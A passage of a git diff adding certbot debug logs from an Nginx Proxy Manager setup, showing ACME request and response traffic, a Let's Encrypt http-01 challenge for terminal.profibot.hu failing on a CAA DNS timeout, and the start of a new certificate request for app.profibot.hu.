"eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMjkwNjQzODE3NiIsICJub25jZSI6ICJ6Nm8zdVhLZ3hZdzNzSTkzcmhEMkFjb1JCSU5yMzBkUGdvSWl5SjdBc3VITU9DMUl6LWciLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2F1dGh6LzI5MDY0MzgxNzYvNjQ5Nzg4NDI3Mzg2In0", + "signature": "hQ1ygHen_0bKyKC6LQdwqh2IVhkYfcuHsdYyB87aRmnAgannfvIisRbR2-TLVxDwA7nkQgJ2I6VI7Img-2reZ_M9B3MLvErQsbVwvBfcOxfMKuFrxje22D0LbB6EvMRE-yyt_jH8Zp1KhfK0g1TiLKcSH6ZPuWF1phrqzdGeaz-0E7nPjh8s3EPvr2nr_psefhcLcib4uTuOS27vxMR5-iEGrYNxukzOHy4bFkR3hH6DmqhokM76i-PdclODbVauycGMjFNtbFwZV3jvlzKrZMlS0iuvReNzzAbi0FWBqJL9Z86JkjORJaOOPb1xw1ipmDQbcdJDBVsRm6njayJLPw", + "payload": "" +} +2026-01-27 23:20:18,830:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/authz/2906438176/649788427386 HTTP/1.1" 200 828 +2026-01-27 23:20:18,831:DEBUG:acme.client:Received response: +HTTP 200 +Server: nginx +Date: Tue, 27 Jan 2026 23:20:18 GMT +Content-Type: application/json +Content-Length: 828 +Connection: keep-alive +Boulder-Requester: 2906438176 +Cache-Control: public, max-age=0, no-cache +Link: ;rel="index" +Replay-Nonce: F4vGLPjlBt9iYqaBT90I1Ryvg9Jw7bW19klSG0kTWnc7mJKhzI4 +X-Frame-Options: DENY +Strict-Transport-Security: max-age=604800 + +{ + "identifier": { + "type": "dns", + "value": "terminal.profibot.hu" + }, + "status": "pending", + "expires": "2026-02-03T23:19:23Z", + "challenges": [ + { + "type": "tls-alpn-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/649788427386/PanWfQ", + "status": "pending", + "token": "KtolfhWy2aolVMc69aYbXPzY2EU6gtQx8-uvkiejZ5w" + }, + { + "type": "dns-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/649788427386/iD1r9Q", + "status": "pending", + "token": "KtolfhWy2aolVMc69aYbXPzY2EU6gtQx8-uvkiejZ5w" + }, + { + "type": "http-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/649788427386/3Lj5Rg", + "status": "pending", + "token": "KtolfhWy2aolVMc69aYbXPzY2EU6gtQx8-uvkiejZ5w" + } + ] +} +2026-01-27 23:20:18,832:DEBUG:acme.client:Storing nonce: F4vGLPjlBt9iYqaBT90I1Ryvg9Jw7bW19klSG0kTWnc7mJKhzI4 +2026-01-27 23:20:18,832:DEBUG:acme.challenges:tls-alpn-01 was not recognized, full message: {'type': 'tls-alpn-01', 'url': 'https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/649788427386/PanWfQ', 'status': 'pending', 'token': 'KtolfhWy2aolVMc69aYbXPzY2EU6gtQx8-uvkiejZ5w'} +2026-01-27 23:20:21,833:DEBUG:acme.client:JWS payload: +b'' +2026-01-27 23:20:21,837:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/authz/2906438176/649788427386: +{ + "protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMjkwNjQzODE3NiIsICJub25jZSI6ICJGNHZHTFBqbEJ0OWlZcWFCVDkwSTFSeXZnOUp3N2JXMTlrbFNHMGtUV25jN21KS2h6STQiLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2F1dGh6LzI5MDY0MzgxNzYvNjQ5Nzg4NDI3Mzg2In0", + "signature": "h75qoSJQBd3HRKU2GedWtgumK_l5JP2uChPtdyHKaQqpnqdLpJt7-8bDvagfIVzUQxVPxCQu6vc_nW1AHRkWhM2XPRf6WAT2eDha_3fVB2TS1TKtYr8JsefhGjNjD8I3aEGXeYoI8CXvDbed-Axp2f5GIePf-gL3zqqv7VCBUVd97G8AtKf9bdie9V4-CFTtBBFms723He2uqkF4h6YUPM7lLDsBEvZ3RtdUdbjWct_V1r18ouOMUHg3tM2SbeqTcJFN4V4JnIw7ceJaGKIFPbatvKcoTWNofONmAopwvzbi5l_sDaRd3Rl7hytWR36UFuiqiRSqxuLQwP_F39ItfA", + "payload": "" +} +2026-01-27 23:20:21,983:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/authz/2906438176/649788427386 HTTP/1.1" 200 828 +2026-01-27 23:20:21,983:DEBUG:acme.client:Received response: +HTTP 200 +Server: nginx +Date: Tue, 27 Jan 2026 23:20:21 GMT +Content-Type: application/json +Content-Length: 828 +Connection: keep-alive +Boulder-Requester: 2906438176 +Cache-Control: public, max-age=0, no-cache +Link: ;rel="index" +Replay-Nonce: z6o3uXKgy4fY4n4JtKnOwfSbjPota3t2ByKsfFFWVuBqy9j4OeQ +X-Frame-Options: DENY +Strict-Transport-Security: max-age=604800 + +{ + "identifier": { + "type": "dns", + "value": "terminal.profibot.hu" + }, + "status": "pending", + "expires": "2026-02-03T23:19:23Z", + "challenges": [ + { + "type": "tls-alpn-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/649788427386/PanWfQ", + "status": "pending", + "token": "KtolfhWy2aolVMc69aYbXPzY2EU6gtQx8-uvkiejZ5w" + }, + { + "type": "dns-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/649788427386/iD1r9Q", + "status": "pending", + "token": "KtolfhWy2aolVMc69aYbXPzY2EU6gtQx8-uvkiejZ5w" + }, + { + "type": "http-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/649788427386/3Lj5Rg", + "status": "pending", + "token": "KtolfhWy2aolVMc69aYbXPzY2EU6gtQx8-uvkiejZ5w" + } + ] +} +2026-01-27 23:20:21,984:DEBUG:acme.client:Storing nonce: z6o3uXKgy4fY4n4JtKnOwfSbjPota3t2ByKsfFFWVuBqy9j4OeQ +2026-01-27 23:20:21,984:DEBUG:acme.challenges:tls-alpn-01 was not recognized, full message: {'type': 'tls-alpn-01', 'url': 'https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/649788427386/PanWfQ', 'status': 'pending', 'token': 'KtolfhWy2aolVMc69aYbXPzY2EU6gtQx8-uvkiejZ5w'} +2026-01-27 23:20:24,986:DEBUG:acme.client:JWS payload: +b'' +2026-01-27 23:20:24,989:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/authz/2906438176/649788427386: +{ + "protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMjkwNjQzODE3NiIsICJub25jZSI6ICJ6Nm8zdVhLZ3k0Zlk0bjRKdEtuT3dmU2JqUG90YTN0MkJ5S3NmRkZXVnVCcXk5ajRPZVEiLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2F1dGh6LzI5MDY0MzgxNzYvNjQ5Nzg4NDI3Mzg2In0", + "signature": "TK8mnIrcvl70Ebc4NQKjQ58ommmwoxvvWbMiyfssfg-F88XDQRu5MvcVXxNsVIuxwyGCrq02licFJVOe_e9iTku4sPfUa04CcXwr61-xXduw7rLHQkeA1RhfCXOBMjnaRvX92jEQh-0BP6nieK0WoBcF39RyBaOeagDkPSXsphca42wBXgn79eUmmwVyzVwBUS7WpEEzwpIvD86QsY4_UdFd7_ATdx7HNns_YDlOVKyuf953jc0tI1y9BxA8cNfFYr0IzmK-LlaFdSDHzML2gJVP9TcHPrKt1338Jty7iemz33NOBzbhnqIi-rWcC6mcMfO-9LkD7-z8SR6J0QMxWw", + "payload": "" +} +2026-01-27 23:20:25,135:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/authz/2906438176/649788427386 HTTP/1.1" 200 828 +2026-01-27 23:20:25,136:DEBUG:acme.client:Received response: +HTTP 200 +Server: nginx +Date: Tue, 27 Jan 2026 23:20:25 GMT +Content-Type: application/json +Content-Length: 828 +Connection: keep-alive +Boulder-Requester: 2906438176 +Cache-Control: public, max-age=0, no-cache +Link: ;rel="index" +Replay-Nonce: z6o3uXKgO13h_j4f0_V6oOCBt5kyYKMGNEYg6KTa-FH23XRPiR0 +X-Frame-Options: DENY +Strict-Transport-Security: max-age=604800 + +{ + "identifier": { + "type": "dns", + "value": "terminal.profibot.hu" + }, + "status": "pending", + "expires": "2026-02-03T23:19:23Z", + "challenges": [ + { + "type": "dns-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/649788427386/iD1r9Q", + "status": "pending", + "token": "KtolfhWy2aolVMc69aYbXPzY2EU6gtQx8-uvkiejZ5w" + }, + { + "type": "tls-alpn-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/649788427386/PanWfQ", + "status": "pending", + "token": "KtolfhWy2aolVMc69aYbXPzY2EU6gtQx8-uvkiejZ5w" + }, + { + "type": "http-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/649788427386/3Lj5Rg", + "status": "pending", + "token": "KtolfhWy2aolVMc69aYbXPzY2EU6gtQx8-uvkiejZ5w" + } + ] +} +2026-01-27 23:20:25,136:DEBUG:acme.client:Storing nonce: z6o3uXKgO13h_j4f0_V6oOCBt5kyYKMGNEYg6KTa-FH23XRPiR0 +2026-01-27 23:20:25,137:DEBUG:acme.challenges:tls-alpn-01 was not recognized, full message: {'type': 'tls-alpn-01', 'url': 'https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/649788427386/PanWfQ', 'status': 'pending', 'token': 'KtolfhWy2aolVMc69aYbXPzY2EU6gtQx8-uvkiejZ5w'} +2026-01-27 23:20:28,138:DEBUG:acme.client:JWS payload: +b'' +2026-01-27 23:20:28,140:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/authz/2906438176/649788427386: +{ + "protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMjkwNjQzODE3NiIsICJub25jZSI6ICJ6Nm8zdVhLZ08xM2hfajRmMF9WNm9PQ0J0NWt5WUtNR05FWWc2S1RhLUZIMjNYUlBpUjAiLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2F1dGh6LzI5MDY0MzgxNzYvNjQ5Nzg4NDI3Mzg2In0", + "signature": "RTEAQhAZK7FUO3erwe4fYiu3Lc83Vj7bSmevhE3_wXzthku_gK-SAzJBXkR8vzShoL0ljjMK_j5BosDEqnh3Jb1bGloQ299fvMU5uRHVaTZsIwxs109I2snJk3s25cqyT64TJ_gg7qDyjl-mDopybwQo67scD2txdiKXhcIFmP9nywMnW4ROK4xg5hA2uxiWYGjfUm2j09WF5nSKDx6DzoY5MSL_SPQl35UjzDiHOccaxfZ4GkGhd4jrgQ4M47G_7h9IWlcToTcwAii3-AV5C785L48-ctiQAa5lhthUMCGxVy7XHqjz2rT6TkrKFlYwaV51EHCOy_fL9Q0DGbJDiw", + "payload": "" +} +2026-01-27 23:20:28,285:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/authz/2906438176/649788427386 HTTP/1.1" 200 1051 +2026-01-27 23:20:28,286:DEBUG:acme.client:Received response: +HTTP 200 +Server: nginx +Date: Tue, 27 Jan 2026 23:20:28 GMT +Content-Type: application/json +Content-Length: 1051 +Connection: keep-alive +Boulder-Requester: 2906438176 +Cache-Control: public, max-age=0, no-cache +Link: ;rel="index" +Replay-Nonce: F4vGLPjloa-4B71IcYqgix_Y9UYf8WT8Hs6ARinMwsHillgBx8w +X-Frame-Options: DENY +Strict-Transport-Security: max-age=604800 + +{ + "identifier": { + "type": "dns", + "value": "terminal.profibot.hu" + }, + "status": "invalid", + "expires": "2026-02-03T23:19:23Z", + "challenges": [ + { + "type": "http-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/649788427386/3Lj5Rg", + "status": "invalid", + "validated": "2026-01-27T23:19:23Z", + "error": { + "type": "urn:ietf:params:acme:error:dns", + "detail": "During secondary validation: While processing CAA for terminal.profibot.hu: DNS problem: query timed out looking up CAA for terminal.profibot.hu", + "status": 400 + }, + "token": "KtolfhWy2aolVMc69aYbXPzY2EU6gtQx8-uvkiejZ5w", + "validationRecord": [ + { + "url": "http://terminal.profibot.hu/.well-known/acme-challenge/KtolfhWy2aolVMc69aYbXPzY2EU6gtQx8-uvkiejZ5w", + "hostname": "terminal.profibot.hu", + "port": "80", + "addressesResolved": [ + "91.82.215.191" + ], + "addressUsed": "91.82.215.191" + } + ] + } + ] +} +2026-01-27 23:20:28,287:DEBUG:acme.client:Storing nonce: F4vGLPjloa-4B71IcYqgix_Y9UYf8WT8Hs6ARinMwsHillgBx8w +2026-01-27 23:20:28,288:INFO:certbot._internal.auth_handler:Challenge failed for domain terminal.profibot.hu +2026-01-27 23:20:28,288:INFO:certbot._internal.auth_handler:http-01 challenge for terminal.profibot.hu +2026-01-27 23:20:28,288:DEBUG:certbot._internal.display.obj:Notifying user: +Certbot failed to authenticate some domains (authenticator: webroot). The Certificate Authority reported these problems: + Domain: terminal.profibot.hu + Type: dns + Detail: During secondary validation: While processing CAA for terminal.profibot.hu: DNS problem: query timed out looking up CAA for terminal.profibot.hu + +Hint: The Certificate Authority failed to download the temporary challenge files created by Certbot. Ensure that the listed domains serve their content from the provided --webroot-path/-w and that files created there can be downloaded from the internet. + +2026-01-27 23:20:28,297:DEBUG:certbot._internal.error_handler:Encountered exception: +Traceback (most recent call last): + File "/opt/certbot/lib/python3.11/site-packages/certbot/_internal/auth_handler.py", line 104, in handle_authorizations + self._poll_authorizations(authzrs, max_retries, max_time_mins, best_effort) + File "/opt/certbot/lib/python3.11/site-packages/certbot/_internal/auth_handler.py", line 208, in _poll_authorizations + raise errors.AuthorizationError('Some challenges have failed.') +certbot.errors.AuthorizationError: Some challenges have failed. + +2026-01-27 23:20:28,298:DEBUG:certbot._internal.error_handler:Calling registered functions +2026-01-27 23:20:28,298:INFO:certbot._internal.auth_handler:Cleaning up challenges +2026-01-27 23:20:28,298:DEBUG:certbot._internal.plugins.webroot:Removing /data/letsencrypt-acme-challenge/.well-known/acme-challenge/KtolfhWy2aolVMc69aYbXPzY2EU6gtQx8-uvkiejZ5w +2026-01-27 23:20:28,299:DEBUG:certbot._internal.plugins.webroot:All challenges cleaned up +2026-01-27 23:20:28,300:DEBUG:certbot._internal.log:Exiting abnormally: +Traceback (most recent call last): + File "/opt/certbot/bin/certbot", line 7, in + sys.exit(main()) + ^^^^^^ + File "/opt/certbot/lib/python3.11/site-packages/certbot/main.py", line 18, in main + return internal_main.main(cli_args) + ^^^^^^^^^^^^^^^^^^^^^^^^^^^^ + File "/opt/certbot/lib/python3.11/site-packages/certbot/_internal/main.py", line 1850, in main + return config.func(config, plugins) + ^^^^^^^^^^^^^^^^^^^^^^^^^^^^ + File "/opt/certbot/lib/python3.11/site-packages/certbot/_internal/main.py", line 1562, in certonly + lineage = _get_and_save_cert(le_client, config, domains, certname, lineage) + ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ + File "/opt/certbot/lib/python3.11/site-packages/certbot/_internal/main.py", line 141, in _get_and_save_cert + lineage = le_client.obtain_and_enroll_certificate(domains, certname) + ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ + File "/opt/certbot/lib/python3.11/site-packages/certbot/_internal/client.py", line 526, in obtain_and_enroll_certificate + cert, chain, key, _ = self.obtain_certificate(domains) + ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ + File "/opt/certbot/lib/python3.11/site-packages/certbot/_internal/client.py", line 427, in obtain_certificate + orderr = self._get_order_and_authorizations(csr.data, self.config.allow_subset_of_names) + ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ + File "/opt/certbot/lib/python3.11/site-packages/certbot/_internal/client.py", line 505, in _get_order_and_authorizations + authzr = self.auth_handler.handle_authorizations(orderr, self.config, best_effort) + ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ + File "/opt/certbot/lib/python3.11/site-packages/certbot/_internal/auth_handler.py", line 104, in handle_authorizations + self._poll_authorizations(authzrs, max_retries, max_time_mins, best_effort) + File "/opt/certbot/lib/python3.11/site-packages/certbot/_internal/auth_handler.py", line 208, in _poll_authorizations + raise errors.AuthorizationError('Some challenges have failed.') +certbot.errors.AuthorizationError: Some challenges have failed. +2026-01-27 23:20:28,307:ERROR:certbot._internal.log:Some challenges have failed. diff --git a/proxy-manager/data/logs/letsencrypt.log.3 b/proxy-manager/data/logs/letsencrypt.log.3 new file mode 100755 index 0000000..6cad131 --- /dev/null +++ b/proxy-manager/data/logs/letsencrypt.log.3 @@ -0,0 +1,1509 @@ +2026-01-20 19:14:20,271:DEBUG:certbot._internal.main:certbot version: 5.1.0 +2026-01-20 19:14:20,271:DEBUG:certbot._internal.main:Location of certbot entry point: /opt/certbot/bin/certbot +2026-01-20 19:14:20,271:DEBUG:certbot._internal.main:Arguments: ['--config', '/etc/letsencrypt.ini', '--work-dir', '/tmp/letsencrypt-lib', '--logs-dir', '/data/logs', '--cert-name', 'npm-16', '--agree-tos', '--authenticator', 'webroot', '-m', 'kincses@gmail.com', '--preferred-challenges', 'http', '--domains', 'app.profibot.hu'] +2026-01-20 19:14:20,271:DEBUG:certbot._internal.main:Discovered plugins: PluginsRegistry(PluginEntryPoint#manual,PluginEntryPoint#null,PluginEntryPoint#standalone,PluginEntryPoint#webroot) +2026-01-20 19:14:20,282:DEBUG:certbot._internal.log:Root logging level set at 30 +2026-01-20 19:14:20,282:DEBUG:certbot._internal.plugins.selection:Requested authenticator webroot and installer None +2026-01-20 19:14:20,282:DEBUG:certbot._internal.plugins.selection:Single candidate plugin: * webroot +Description: Saves the necessary validation files to a .well-known/acme-challenge/ directory within the nominated webroot path. A separate HTTP server must be running and serving files from the webroot path. HTTP challenge only (wildcards not supported). +Interfaces: Authenticator, Plugin +Entry point: EntryPoint(name='webroot', value='certbot._internal.plugins.webroot:Authenticator', group='certbot.plugins') +Initialized: +Prep: True +2026-01-20 19:14:20,282:DEBUG:certbot._internal.plugins.selection:Selected authenticator and installer None +2026-01-20 19:14:20,283:INFO:certbot._internal.plugins.selection:Plugins selected: Authenticator webroot, Installer None +2026-01-20 19:14:20,320:DEBUG:certbot._internal.main:Picked account: +2026-01-20 19:14:20,320:DEBUG:acme.client:Sending GET request to https://acme-v02.api.letsencrypt.org/directory. +2026-01-20 19:14:20,321:DEBUG:urllib3.connectionpool:Starting new HTTPS connection (1): acme-v02.api.letsencrypt.org:443 +2026-01-20 19:14:20,792:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "GET /directory HTTP/1.1" 200 1033 +2026-01-20 19:14:20,793:DEBUG:acme.client:Received response: +HTTP 200 +Server: nginx +Date: Tue, 20 Jan 2026 19:14:20 GMT +Content-Type: application/json +Content-Length: 1033 +Connection: keep-alive +Cache-Control: public, max-age=0, no-cache +X-Frame-Options: DENY +Strict-Transport-Security: max-age=604800 + +{ + "_z9Dwg6jJH0": "https://community.letsencrypt.org/t/adding-random-entries-to-the-directory/33417", + "keyChange": "https://acme-v02.api.letsencrypt.org/acme/key-change", + "meta": { + "caaIdentities": [ + "letsencrypt.org" + ], + "profiles": { + "classic": "https://letsencrypt.org/docs/profiles#classic", + "shortlived": "https://letsencrypt.org/docs/profiles#shortlived", + "tlsclient": "https://letsencrypt.org/docs/profiles#tlsclient", + "tlsserver": "https://letsencrypt.org/docs/profiles#tlsserver" + }, + "termsOfService": "https://letsencrypt.org/documents/LE-SA-v1.6-August-18-2025.pdf", + "website": "https://letsencrypt.org" + }, + "newAccount": "https://acme-v02.api.letsencrypt.org/acme/new-acct", + "newNonce": "https://acme-v02.api.letsencrypt.org/acme/new-nonce", + "newOrder": "https://acme-v02.api.letsencrypt.org/acme/new-order", + "renewalInfo": "https://acme-v02.api.letsencrypt.org/acme/renewal-info", + "revokeCert": "https://acme-v02.api.letsencrypt.org/acme/revoke-cert" +} +2026-01-20 19:14:20,794:DEBUG:certbot._internal.display.obj:Notifying user: Requesting a certificate for app.profibot.hu +2026-01-20 19:14:20,800:DEBUG:acme.client:Requesting fresh nonce +2026-01-20 19:14:20,800:DEBUG:acme.client:Sending HEAD request to https://acme-v02.api.letsencrypt.org/acme/new-nonce. +2026-01-20 19:14:20,955:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "HEAD /acme/new-nonce HTTP/1.1" 200 0 +2026-01-20 19:14:20,956:DEBUG:acme.client:Received response: +HTTP 200 +Server: nginx +Date: Tue, 20 Jan 2026 19:14:20 GMT +Connection: keep-alive +Cache-Control: public, max-age=0, no-cache +Link: ;rel="index" +Replay-Nonce: 82ktJIqYjB_Jbh6yuGkv4RjcjkOQ7JhrUyprmtZJEdGP4ft-HzE +X-Frame-Options: DENY +Strict-Transport-Security: max-age=604800 + + +2026-01-20 19:14:20,956:DEBUG:acme.client:Storing nonce: 82ktJIqYjB_Jbh6yuGkv4RjcjkOQ7JhrUyprmtZJEdGP4ft-HzE +2026-01-20 19:14:20,957:DEBUG:acme.client:JWS payload: +b'{\n "identifiers": [\n {\n "type": "dns",\n "value": "app.profibot.hu"\n }\n ]\n}' +2026-01-20 19:14:20,962:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/new-order: +{ + "protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMjkwNjQzODE3NiIsICJub25jZSI6ICI4Mmt0SklxWWpCX0piaDZ5dUdrdjRSamNqa09RN0poclV5cHJtdFpKRWRHUDRmdC1IekUiLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL25ldy1vcmRlciJ9", + "signature": "lPEZ0pNj90ry0arKNHT4ImHmKrFBoz4dgKrl47dpxSe63Mon3OBhhmWe481oCr1wXxHMHmcz7F89hdt9RCwkzrdZ4R6zp8YweJOlDFRnerRy7_7EpTibN_2_mmYdzfLT2NmKAGiK-6nK3xMtORtzu6c0-qUcYaggJ9ne-KI-nx1ttS5TQiHaaE35CCV_ZQD5hJ6vRv02yH2s2jbK_09VPruggHk5FeMgFvLo51SntF-GppIEIDAk79Q53UkNQ2r5jiqOcjanAslIeLeVV21nSYkQP---7bXlHW9v9ExkUJWDQeSqerokXJjm0hk_QO7ok20K_0EmCQySFJsVzwXIKg", + "payload": "ewogICJpZGVudGlmaWVycyI6IFsKICAgIHsKICAgICAgInR5cGUiOiAiZG5zIiwKICAgICAgInZhbHVlIjogImFwcC5wcm9maWJvdC5odSIKICAgIH0KICBdCn0" +} +2026-01-20 19:14:21,150:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/new-order HTTP/1.1" 201 349 +2026-01-20 19:14:21,151:DEBUG:acme.client:Received response: +HTTP 201 +Server: nginx +Date: Tue, 20 Jan 2026 19:14:21 GMT +Content-Type: application/json +Content-Length: 349 +Connection: keep-alive +Boulder-Requester: 2906438176 +Cache-Control: public, max-age=0, no-cache +Link: ;rel="index" +Location: https://acme-v02.api.letsencrypt.org/acme/order/2906438176/471639170836 +Replay-Nonce: l5FKN_ymiVWUKCJdU2YsOh6Boure2eZelgxd3Ur4prmJgfkGe68 +X-Frame-Options: DENY +Strict-Transport-Security: max-age=604800 + +{ + "status": "pending", + "expires": "2026-01-27T19:14:21Z", + "identifiers": [ + { + "type": "dns", + "value": "app.profibot.hu" + } + ], + "authorizations": [ + "https://acme-v02.api.letsencrypt.org/acme/authz/2906438176/646154860406" + ], + "finalize": "https://acme-v02.api.letsencrypt.org/acme/finalize/2906438176/471639170836" +} +2026-01-20 19:14:21,151:DEBUG:acme.client:Storing nonce: l5FKN_ymiVWUKCJdU2YsOh6Boure2eZelgxd3Ur4prmJgfkGe68 +2026-01-20 19:14:21,152:DEBUG:acme.client:JWS payload: +b'' +2026-01-20 19:14:21,155:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/authz/2906438176/646154860406: +{ + "protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMjkwNjQzODE3NiIsICJub25jZSI6ICJsNUZLTl95bWlWV1VLQ0pkVTJZc09oNkJvdXJlMmVaZWxneGQzVXI0cHJtSmdma0dlNjgiLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2F1dGh6LzI5MDY0MzgxNzYvNjQ2MTU0ODYwNDA2In0", + "signature": "N807uyCcOWm_2u93qHf3sPQGJs6zSGrMR3DkUVYBYR0_YpTRbt6ovsixi62LA3WUjpgzunI370BQRQuyuftJDAG864BZ5yhHiLwiqV1PHFYBQUogUXadrB-R0qwiM64f8eLKUvWZVraAj8177Ita_lTTRXZ05fGGhz3mJmK4saFJQiwaCrvCccyCQvkN77H3SUXvRI22oiDhTMsdORoLD63rfoCfkFdk56K4mvbq1zdxHIz0sGKEKJxT11fye5iesTIuCljuVGI6Of-3MXxRV-d80mFWlnbumQGDClUeFzfayet1NxP_TAmElaPyjJZK6HUqeLFNpuRxyTOsVMfI2A", + "payload": "" +} +2026-01-20 19:14:21,313:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/authz/2906438176/646154860406 HTTP/1.1" 200 823 +2026-01-20 19:14:21,314:DEBUG:acme.client:Received response: +HTTP 200 +Server: nginx +Date: Tue, 20 Jan 2026 19:14:21 GMT +Content-Type: application/json +Content-Length: 823 +Connection: keep-alive +Boulder-Requester: 2906438176 +Cache-Control: public, max-age=0, no-cache +Link: ;rel="index" +Replay-Nonce: 82ktJIqYtAs7qqknUsIMLeNZXlsSqMjuROP5O6giJQf_7nmgu68 +X-Frame-Options: DENY +Strict-Transport-Security: max-age=604800 + +{ + "identifier": { + "type": "dns", + "value": "app.profibot.hu" + }, + "status": "pending", + "expires": "2026-01-27T19:14:21Z", + "challenges": [ + { + "type": "dns-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/646154860406/58N6GA", + "status": "pending", + "token": "fa3hNRmg4MuW5DiN2Jh7UIsjFyywoDpeaSC25Yh-SJ4" + }, + { + "type": "tls-alpn-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/646154860406/GDcGVw", + "status": "pending", + "token": "fa3hNRmg4MuW5DiN2Jh7UIsjFyywoDpeaSC25Yh-SJ4" + }, + { + "type": "http-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/646154860406/F6m4Kw", + "status": "pending", + "token": "fa3hNRmg4MuW5DiN2Jh7UIsjFyywoDpeaSC25Yh-SJ4" + } + ] +} +2026-01-20 19:14:21,315:DEBUG:acme.client:Storing nonce: 82ktJIqYtAs7qqknUsIMLeNZXlsSqMjuROP5O6giJQf_7nmgu68 +2026-01-20 19:14:21,315:DEBUG:acme.challenges:tls-alpn-01 was not recognized, full message: {'type': 'tls-alpn-01', 'url': 'https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/646154860406/GDcGVw', 'status': 'pending', 'token': 'fa3hNRmg4MuW5DiN2Jh7UIsjFyywoDpeaSC25Yh-SJ4'} +2026-01-20 19:14:21,316:INFO:certbot._internal.auth_handler:Performing the following challenges: +2026-01-20 19:14:21,316:INFO:certbot._internal.auth_handler:http-01 challenge for app.profibot.hu +2026-01-20 19:14:21,317:INFO:certbot._internal.plugins.webroot:Using the webroot path /data/letsencrypt-acme-challenge for all unmatched domains. +2026-01-20 19:14:21,317:DEBUG:certbot._internal.plugins.webroot:Creating root challenges validation dir at /data/letsencrypt-acme-challenge/.well-known/acme-challenge +2026-01-20 19:14:21,319:DEBUG:certbot._internal.plugins.webroot:Attempting to save validation to /data/letsencrypt-acme-challenge/.well-known/acme-challenge/fa3hNRmg4MuW5DiN2Jh7UIsjFyywoDpeaSC25Yh-SJ4 +2026-01-20 19:14:21,319:DEBUG:acme.client:JWS payload: +b'{}' +2026-01-20 19:14:21,320:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/646154860406/F6m4Kw: +{ + "protected": 